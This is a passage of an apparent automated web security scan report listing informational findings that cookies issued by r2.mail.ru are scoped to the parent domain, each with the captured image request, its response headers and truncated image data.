Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:14 GMT
Content-Type: image/gif
Content-Length: 132
Connection: keep-alive
Set-Cookie: p=cuMGAEjl4gAA; expires=Wed, 24-Apr-13 14:21:14 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:14 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

GIF89a/..................!.......,..../.....U.....c.......(.........j..[...
........H..p...7.)e../.B1M....4"5\...V...2`<8.........;

15.50. http://r2.mail.ru/b12526210.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12526210.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12526210.gif HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:14 GMT
Content-Type: image/gif
Content-Length: 135
Connection: keep-alive
Set-Cookie: p=6usGAErxkwAA; expires=Wed, 24-Apr-13 14:21:14 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:14 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

GIF89a................;.;............!.......,..........L(...%.X.......\$..hv...B@z........A....H.t.)...-P.d*6..@e2....J.RN...B...ht..;

15.51. http://r2.mail.ru/b12527647.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12527647.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12527647.gif HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:14 GMT
Content-Type: image/gif
Content-Length: 131
Connection: keep-alive
Set-Cookie: p=A+wGAEqNqQAA; expires=Wed, 24-Apr-13 14:21:14 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:14 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

GIF89a........P.....D................!.......,..........H....$.H.$B..k..UQ...\.(....9|sfF...7..0J.d..!..Q.09b&.0$......G.R...x.H..;

15.52. http://r2.mail.ru/b12529050.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12529050.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12529050.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:27 GMT
Content-Type: image/jpeg
Content-Length: 3351
Connection: keep-alive
Set-Cookie: p=eucGAEvDVAAA; expires=Wed, 24-Apr-13 14:21:27 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:27 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....H.H.....C......................
.....
...
.................................C.......    ..    ..........................................................<.<.................................
...[SNIP]...

15.53. http://r2.mail.ru/b12530142.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12530142.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12530142.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:28 GMT
Content-Type: image/jpeg
Content-Length: 2303
Connection: keep-alive
Set-Cookie: p=qBoHAE3xEgAA; expires=Wed, 24-Apr-13 14:21:28 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:28 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....H.H.....C......................
.....
...
.................................C.......    ..    ..........................................................<.<.."..............................
...[SNIP]...

15.54. http://r2.mail.ru/b12530159.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12530159.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12530159.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoEACDL8gAAdDQMfV4MAQAIEwAI

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:34 GMT
Content-Type: image/jpeg
Content-Length: 2119
Connection: keep-alive
Set-Cookie: p=qPsGAFqt5gAA; expires=Wed, 24-Apr-13 14:21:34 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:34 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.............C......................
.....
...
.................................C.......    ..    ..........................................................<.<.."..............................
...[SNIP]...

15.55. http://r2.mail.ru/b12531249.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12531249.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12531249.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoEACDL8gAAdDQMfV4MAQAIEwAI

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:34 GMT
Content-Type: image/jpeg
Content-Length: 1807
Connection: keep-alive
Set-Cookie: p=vOoGAFLrEgAA; expires=Wed, 24-Apr-13 14:21:34 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:34 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....H.H.....C......................
.....
...
.................................C.......    ..    ..........................................................<.<.."..............................
...[SNIP]...

15.56. http://r2.mail.ru/b12531545.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12531545.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12531545.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:28 GMT
Content-Type: image/jpeg
Content-Length: 1374
Connection: keep-alive
Set-Cookie: p=NdYGAE3BGQAA; expires=Wed, 24-Apr-13 14:21:28 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:28 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....,.,.....C......................
.....
...
.................................C.......    ..    ..........................................................<.<..!..............................
...[SNIP]...

15.57. http://r2.mail.ru/b12531624.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12531624.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12531624.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoEACDL8gAAdDQMfV4MAQAIEwAI

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:36 GMT
Content-Type: image/jpeg
Content-Length: 1811
Connection: keep-alive
Set-Cookie: p=Z+kGAFnN4QAA; expires=Wed, 24-Apr-13 14:21:36 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:36 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....H.H.....C......................
.....
...
.................................C.......    ..    ..........................................................<.<..!..............................
...[SNIP]...

15.58. http://r2.mail.ru/b12532203.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12532203.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12532203.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoEACDL8gAAdDQMfV4MAQAIEwAI

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:34 GMT
Content-Type: image/jpeg
Content-Length: 2157
Connection: keep-alive
Set-Cookie: p=ueEGAEipQQAA; expires=Wed, 24-Apr-13 14:21:34 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:34 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....H.H.....C......................
.....
...
.................................C.......    ..    ..........................................................<.<.."..............................
...[SNIP]...

15.59. http://r2.mail.ru/b12752186.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12752186.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12752186.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:26 GMT
Content-Type: image/jpeg
Content-Length: 1841
Connection: keep-alive
Set-Cookie: p=iBoHAE3xEgAA; expires=Wed, 24-Apr-13 14:21:26 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:26 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 85
...C.........................    ....................!........."$".$.......C..............................................
...[SNIP]...

15.60. http://r2.mail.ru/b12752583.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12752583.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12752583.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:33 GMT
Content-Type: image/jpeg
Content-Length: 1772
Connection: keep-alive
Set-Cookie: p=NOkGAFnN4QAA; expires=Wed, 24-Apr-13 14:21:33 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:33 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....H.H.....C......................
.....
...
....................................<.<..................................    
.....................}........!1A..Qa."q.2....#B...R..$3br.    
.....
...[SNIP]...

15.61. http://r2.mail.ru/b12752584.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12752584.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12752584.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:33 GMT
Content-Type: image/jpeg
Content-Length: 5872
Connection: keep-alive
Set-Cookie: p=K/QGAEvncgAA; expires=Wed, 24-Apr-13 14:21:33 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:33 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....d.d......Ducky.......d......Adobe.d.................................................................................................................................................<.<..
...[SNIP]...

15.62. http://r2.mail.ru/b12752585.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12752585.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12752585.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:33 GMT
Content-Type: image/jpeg
Content-Length: 5320
Connection: keep-alive
Set-Cookie: p=79sGAErbVQAA; expires=Wed, 24-Apr-13 14:21:33 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:33 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....d.d......Ducky.......d......Adobe.d.................................................................................................................................................<.<..
...[SNIP]...

15.63. http://r2.mail.ru/b12752586.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12752586.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12752586.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:33 GMT
Content-Type: image/jpeg
Content-Length: 4402
Connection: keep-alive
Set-Cookie: p=z+8GAE/NaQAA; expires=Wed, 24-Apr-13 14:21:33 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:33 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....d.d......Ducky.......d......Adobe.d.................................................................................................................................................<.<..
...[SNIP]...

15.64. http://r2.mail.ru/b12855502.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12855502.png

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12855502.png HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:12 GMT
Content-Type: image/png
Content-Length: 2692
Connection: keep-alive
Set-Cookie: p=8twGAErJFgAA; expires=Wed, 24-Apr-13 14:21:12 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:12 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

.PNG
.
...IHDR..............w=.....tEXtSoftware.Adobe ImageReadyq.e<... iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...

15.65. http://r2.mail.ru/b12887675.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12887675.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12887675.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:33 GMT
Content-Type: image/jpeg
Content-Length: 3685
Connection: keep-alive
Set-Cookie: p=QYwGAFT5qgAA; expires=Wed, 24-Apr-13 14:21:33 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:33 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....d.d......Ducky.......P......Adobe.d.....................................................        

       ......................    ..    .    ........................................................<.<..
...[SNIP]...

15.66. http://r2.mail.ru/b12887676.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12887676.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12887676.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:33 GMT
Content-Type: image/jpeg
Content-Length: 3621
Connection: keep-alive
Set-Cookie: p=L/YGAE2r7QAA; expires=Wed, 24-Apr-13 14:21:33 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:33 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

